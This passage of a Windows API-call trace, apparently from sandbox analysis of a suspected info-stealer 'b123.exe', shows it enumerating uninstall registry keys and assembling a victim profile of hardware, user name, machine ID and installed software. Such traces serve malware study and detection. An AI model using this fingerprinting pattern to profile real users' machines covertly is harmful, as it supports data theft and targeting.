lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030", lpcbData=0x197fac*=0x3b) returned 0x0 [0235.136] lstrlenA (lpString="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030") returned 58 [0235.137] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\n", lpString2="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030" [0235.137] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="11.0.61030", lpcbData=0x197fac*=0xb) returned 0x0 [0235.137] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 " [0235.137] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 ", lpString2="11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030" [0235.137] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\n" [0235.137] RegCloseKey (hKey=0x384) returned 0x0 [0235.137] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x21, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.137] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned 90 [0235.137] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.137] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030", lpcbData=0x197fac*=0x3d) returned 0x0 [0235.137] lstrlenA (lpString="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030") returned 60 [0235.138] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\n", lpString2="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 